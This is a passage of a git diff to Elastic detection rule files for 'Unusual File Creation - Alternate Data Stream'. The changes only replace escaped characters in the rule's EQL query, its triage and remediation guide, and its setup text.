shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n file.path : \"C:\\\\*:*\" and\n not file.path : \"C:\\\\*:zone.identifier*\" and\n\n not process.executable :\n (\"?:\\\\windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\System32\\\\sihost.exe\",\n \"?:\\\\Windows\\\\System32\\\\PickerHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchProtocolHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\",\n \"?:\\\\Program Files\\\\Rivet Networks\\\\SmartByte\\\\SmartByteNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files\\\\ExpressConnect\\\\ExpressConnectNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Program Files(x86)\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\POWERPNT.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\POWERPNT.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\WINWORD.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\WINWORD.EXE\") and\n\n file.extension :\n (\n \"pdf\",\n \"dll\",\n \"png\",\n \"exe\",\n \"dat\",\n \"com\",\n \"bat\",\n \"cmd\",\n \"sys\",\n \"vbs\",\n \"ps1\",\n \"hta\",\n \"txt\",\n \"vbe\",\n \"js\",\n \"wsh\",\n \"docx\",\n \"doc\",\n \"xlsx\",\n \"xls\",\n \"pptx\",\n \"ppt\",\n \"rtf\",\n \"gif\",\n \"jpg\",\n \"png\",\n \"bmp\",\n \"img\",\n \"iso\"\n )\n", "related_integrations": [ { @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "71bccb61-e19b-452f-b104-79a60e546a95", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_110.json b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_110.json index c5451ba3b7b..66a810d6460 100644 --- a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_110.json +++ b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_110.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual File Creation - Alternate Data Stream", - "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n file.path : \"C:\\\\*:*\" and\n not file.path : \n (\"C:\\\\*:zone.identifier*\",\n \"C:\\\\users\\\\*\\\\appdata\\\\roaming\\\\microsoft\\\\teams\\\\old_weblogs_*:$DATA\") and\n\n not process.executable :\n (\"?:\\\\windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\System32\\\\sihost.exe\",\n \"?:\\\\Windows\\\\System32\\\\PickerHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchProtocolHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\",\n \"?:\\\\Program Files\\\\Rivet Networks\\\\SmartByte\\\\SmartByteNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files\\\\ExpressConnect\\\\ExpressConnectNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Program Files(x86)\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\POWERPNT.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\POWERPNT.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\WINWORD.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\WINWORD.EXE\") and\n\n file.extension :\n (\n \"pdf\",\n \"dll\",\n \"png\",\n \"exe\",\n \"dat\",\n \"com\",\n \"bat\",\n \"cmd\",\n \"sys\",\n \"vbs\",\n \"ps1\",\n \"hta\",\n \"txt\",\n \"vbe\",\n \"js\",\n \"wsh\",\n \"docx\",\n \"doc\",\n \"xlsx\",\n \"xls\",\n \"pptx\",\n \"ppt\",\n \"rtf\",\n \"gif\",\n \"jpg\",\n \"png\",\n \"bmp\",\n \"img\",\n \"iso\"\n )\n", "related_integrations": [ { @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "71bccb61-e19b-452f-b104-79a60e546a95", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_111.json b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_111.json index ccd0208fe5f..200339f4404 100644 --- a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_111.json +++ b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_111.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual File Creation - Alternate Data Stream", - "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n file.path : \"C:\\\\*:*\" and\n not file.path : \n (\"C:\\\\*:zone.identifier*\",\n \"C:\\\\users\\\\*\\\\appdata\\\\roaming\\\\microsoft\\\\teams\\\\old_weblogs_*:$DATA\") and\n\n not process.executable :\n (\"?:\\\\windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\System32\\\\sihost.exe\",\n \"?:\\\\Windows\\\\System32\\\\PickerHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchProtocolHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\",\n \"?:\\\\Program Files\\\\Rivet Networks\\\\SmartByte\\\\SmartByteNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files\\\\ExpressConnect\\\\ExpressConnectNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Program Files(x86)\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\POWERPNT.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\POWERPNT.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\WINWORD.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\WINWORD.EXE\") and\n\n file.extension :\n (\n \"pdf\",\n \"dll\",\n \"png\",\n \"exe\",\n \"dat\",\n \"com\",\n \"bat\",\n \"cmd\",\n \"sys\",\n \"vbs\",\n \"ps1\",\n \"hta\",\n \"txt\",\n \"vbe\",\n \"js\",\n \"wsh\",\n \"docx\",\n \"doc\",\n \"xlsx\",\n \"xls\",\n \"pptx\",\n \"ppt\",\n \"rtf\",\n \"gif\",\n \"jpg\",\n \"png\",\n \"bmp\",\n \"img\",\n \"iso\"\n )\n", "related_integrations": [ { @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "71bccb61-e19b-452f-b104-79a60e546a95", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_112.json b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_112.json index 22532b5daf5..4e96535346c 100644 --- a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_112.json +++ b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_112.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual File Creation - Alternate Data Stream", - "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate 